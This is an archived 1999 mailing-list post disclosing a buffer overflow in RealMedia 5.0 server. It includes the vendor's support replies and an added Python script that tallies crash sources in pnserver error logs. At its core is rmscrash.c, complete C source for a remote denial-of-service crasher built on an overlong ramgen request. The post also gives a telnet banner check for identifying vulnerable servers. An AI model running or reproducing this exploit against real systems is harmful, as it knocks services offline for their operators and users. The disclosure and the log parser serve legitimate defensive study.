RealMedia Server 5.0 Crasher (rmscrash.c)

From: bow (bowat_private)
Date: Wed Dec 22 1999 - 22:33:21 PST

    RealMedia 5.0 servers, and probably 4.0, can be crashed by overflowing
    the buffer which stores the ramgen requests.
    
    I emailed RealNetworks about it and they finally got back to me a month and
    a half later. Their response was that it's a known issue with 5.0 and the
    only way to fix it is to upgrade to 6.0. Of course upgrading means paying
    more money.
    
    I really wish all companies would fully back their COMMERCIAL software and
    make patches for previous releases. Oh well.
    
    The exploit is included below. It's been tested on FreeBSD and RealMedia
    server 5.0-rvserver-build-290. When the server crashes, it logs the IP of the
    person who crashed it in the pnserver error log. It looks like this:
    
      ***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Attempting Crash Avoidance...
      ***22-Dec-99 10:57:16.112 pnserver(241): Fault caused by type 0 client from 204.216.183.2
      ***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Crash Avoidance Successful
      ***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Couldn't Handle Fault: Terminating...
      ***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Please File Bug Report
    
    An easy way to tell if a server is running 5.0 is to telnet to the RealMedia port,
    usually 7070, and type:
    
      GET /SmpDsBhgRl <enter><enter>
    
    From what I've seen, RealMedia 5.0 servers always return "Server: RealServer 1.0 Beta" in the
    headers, and G2 (6.0, and 7.0?) servers return "Server: RMServer 1.0".
    
    A hacked-up fix for the problem that I've used is to edit the pnserver binary and change the ramgen
    string to something else. This, however, will break the ramgen functionality (which I don't use).
    If you are going to rename the ramgen in the binary to something else, make sure it matches the string
    length of 6.
    
    
    -bow
    
    
    
    -- START OF RMSCRASH.C --
    
    /*
     *  rmscrash.c  - bowat_private
     *
     *  Crash a RealMedia 5.0 server by sending a very long ramgen request.
     *
     *  Test on:
     *         $ pnserver -v
     *         Version:        5.0-rvserver-build-290
     *         Platform: FreeBSD-2.1.x
     *
     */

    #include        <stdio.h>
    #include        <stdlib.h>
    #include        <string.h>      /* memset(), memcpy(), strlen() */
    #include        <sys/time.h>
    #include        <sys/types.h>
    #include        <unistd.h>

    #include        <sys/socket.h>
    #include        <netinet/in.h>
    #include        <netdb.h>

    #define BUFLEN 4082

    /* BUFLEN bytes of request line, 13 bytes of HTTP trailer, one NUL.
     * buf is a zero-initialised global, so the NUL is already there. */
    char    buf[BUFLEN+14];
    int     sock;
    struct  sockaddr_in sa;
    struct  hostent *hp;

    int main (int argc, char *argv[]) {
            int port;

            if (argc < 3) {
                    printf("Usage: %s realserver port\n",argv[0]);
                    exit(-1);
            }

            port = atoi(argv[2]);

            /* "GET /ramgen/" followed by 'A' padding up to BUFLEN bytes,
             * then the request terminator */
            memset(buf,0x41,BUFLEN);
            memcpy(buf,"GET /ramgen/",12);
            memcpy(buf+BUFLEN," HTTP/1.1\r\n\r\n", 13);

            /* gethostbyname() reports errors via h_errno, not errno */
            if ((hp=gethostbyname(argv[1]))==NULL) {
                    herror("gethostbyname()");
                    exit(0);
            }

            if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
                    perror("socket()");
                    exit(0);
            }
            sa.sin_family=AF_INET;
            sa.sin_port=htons(port);
            memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
            if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
                    perror("connect()");
                    exit(0);
            }

            printf("Connected to %s. Sending data\n",argv[1]);
            write(sock,buf,strlen(buf));
            printf("Done.\n");

            close(sock);
            return 0;
    }
    
    --- END OF RMSCRASH.C ---
    
    
    ----- Forwarded message from tsserverat_private -----
    
    From: tsserverat_private
    Date: Wed, 22 Dec 1999 10:14:57  -0800
    Subject: Re: max the ramgen buffer [#7570768]
    To: bowat_private
    X-MIME-Autoconverted: from quoted-printable to 8bit by bow.net id KAA03016
    
    Hello Bow,
    
    No, unfortunately there is not. The solution is to upgrade to 6.0 or 7.0.
    
    Best wishes,
    Kim
    ~~~~~~~~~~~~~~~~~~~~
    Kimberly Ayars
    SDK Support Engineer
    ------- Original Message --------
    >From:		 bowat_private
    >To:		 tsserverat_private
    >Subject:	 Re: max the ramgen buffer [#7570768]
    >Date:		 12/21/99 16:58:20
    >
    >
    >Well is there a fix for this in the 5.0 server??
    >
    >-bow
    >
    >On Tue, Dec 21, 1999 at 04:52:07PM -0800, tsserverat_private wrote:
    >> Hello Bow,
    >>
    >> First of all, I apologize for the delay in responding. Thank you so much for your patience.
    >>
    >> This is a known issue in the 5.0 RealServer and is fixed in the 6.0 and 7.0 RealServers.
    >>
    >> Best wishes,
    >> Kim
    >> ~~~~~~~~~~~~~~~~~~~~
    >> Kimberly Ayars
    >> SDK Support Engineer
    >> ------- Original Message --------
    >> >From:		 bowat_private
    >> >To:		 tsserverat_private
    >> >Subject:	 max the ramgen buffer
    >> >Date:		 11/06/99 04:10:46
    >> >
    >> >
    >> > Making a request to the Real5 server with a long (~4040 bytes) request will crash the server. Is this a known issue?
    >> >
    >> >***06-Nov-99 03:48:40.248 pnserver(60580): TRAPPED FAULT: Please File Bug Report
    >> >***06-Nov-99 03:48:40.248 pnserver(60580): Fault Report:
    >> >5.0-rvserver-build-290
    >> >FreeBSD-2.1.x
    >> >
    >> >
    >> >Do you guys have an updated Real5 server?
    >> >
    >> >
    >> THE INFORMATION PROVIDED IN THE REALNETWORKS KNOWLEDGE BASE IS PROVIDED 'AS IS' WITHOUT WARRANTY OF ANY KIND. REALNETWORKS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL REALNETWORKS OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF REALNETWORKS OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY.
    >>
    >>
    >> Copyright c RealNetworks Inc. and/or its licensors, 1995 - 1999 all rights reserved. RealAudio, RealVideo, RealMedia and RealPlayer are trademarks of RealNetworks Inc.
    >>
    >>
    >> ---------------------
    >> Instructions to Reply
    >> ---------------------
    >>
    >>
    >> Your Incident ID number for this request is 7570768
    >>
    >> To reply to this message you may simply reply to this email.  (Please do not modify the subject line)
    >>
    >> To view all activity on this ticket go to the following URL.  You will also be able to reply from there.
    >>
    >>
    >> http://customerrelations.real.com/scripts/rnforms/loginpage.asp
    >>
    >>
    >> To verify your identity, you will be prompted for this Incident ID number and your email address.
    >>
    >>
    >
    >
    
    ----- End forwarded message -----
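    The post notes that when the 5.0 server traps the fault it writes the offending client's IP to the pnserver error log before terminating. The following parser is an added example (not part of the original post or of RealNetworks' software) that turns those log lines into something an operator can act on: it counts trapped faults per source IP and reports which server process actually died. The line format is taken from the excerpt quoted above; the additional log lines, the second client address and the process ID 305 are constructed for the demo.

```python
"""Summarise RealServer 5.0 pnserver error-log fault records.

Added example, not part of the original post.  Line format follows the
excerpt in the post; the extra sample lines below are constructed.
"""
import re
from collections import Counter
from typing import Dict, Iterable, NamedTuple, Optional, Set

# Matches: ***22-Dec-99 10:57:16.112 pnserver(241): <message>
LINE_RE = re.compile(
    r"^\*{3}(?P<ts>\d{2}-[A-Za-z]{3}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3}) "
    r"pnserver\((?P<pid>\d+)\): (?P<msg>.*)$"
)
# Matches the message that names the client that triggered the fault
FAULT_SRC_RE = re.compile(
    r"^Fault caused by type (?P<ctype>\d+) client from "
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})$"
)
FATAL_PREFIX = "FATAL ERROR: Couldn't Handle Fault"


class LogEvent(NamedTuple):
    ts: str
    pid: int
    msg: str


def parse_line(line: str) -> Optional[LogEvent]:
    """Return a LogEvent for a well-formed pnserver record, else None."""
    m = LINE_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    return LogEvent(m.group("ts"), int(m.group("pid")), m.group("msg"))


def fault_sources(lines: Iterable[str]) -> Dict[str, int]:
    """Map client IP -> number of trapped faults attributed to it."""
    counts: Counter = Counter()
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue          # not a pnserver record; skip silently
        m = FAULT_SRC_RE.match(ev.msg)
        if m:
            counts[m.group("ip")] += 1
    return dict(counts)


def fatal_pids(lines: Iterable[str]) -> Set[int]:
    """PIDs whose crash avoidance failed and which terminated."""
    pids: Set[int] = set()
    for line in lines:
        ev = parse_line(line)
        if ev is not None and ev.msg.startswith(FATAL_PREFIX):
            pids.add(ev.pid)
    return pids


# Constructed sample: the five lines from the post, then a restarted
# server (pid 305, constructed) hit twice more, plus one junk line.
SAMPLE_LOG = [
    "***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Attempting Crash Avoidance...",
    "***22-Dec-99 10:57:16.112 pnserver(241): Fault caused by type 0 client from 204.216.183.2",
    "***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Crash Avoidance Successful",
    "***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Couldn't Handle Fault: Terminating...",
    "***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Please File Bug Report",
    "***22-Dec-99 11:02:03.500 pnserver(305): TRAPPED FAULT: Attempting Crash Avoidance...",
    "***22-Dec-99 11:02:03.500 pnserver(305): Fault caused by type 0 client from 192.0.2.10",
    "***22-Dec-99 11:02:03.501 pnserver(305): TRAPPED FAULT: Crash Avoidance Successful",
    "***22-Dec-99 11:05:44.010 pnserver(305): TRAPPED FAULT: Attempting Crash Avoidance...",
    "***22-Dec-99 11:05:44.010 pnserver(305): Fault caused by type 0 client from 204.216.183.2",
    "this line is not a pnserver log record",
]

if __name__ == "__main__":
    for ip, n in sorted(fault_sources(SAMPLE_LOG).items(), key=lambda kv: -kv[1]):
        print(f"{ip:<16} trapped faults: {n}")
    print("terminated pids:", sorted(fatal_pids(SAMPLE_LOG)))
```

    Run against a real error log with `fault_sources(open(path))`; repeated faults from one address are the signal worth alerting on, and a PID in `fatal_pids` means the "Crash Avoidance" step failed and the server actually went down.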
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:23:02 PDT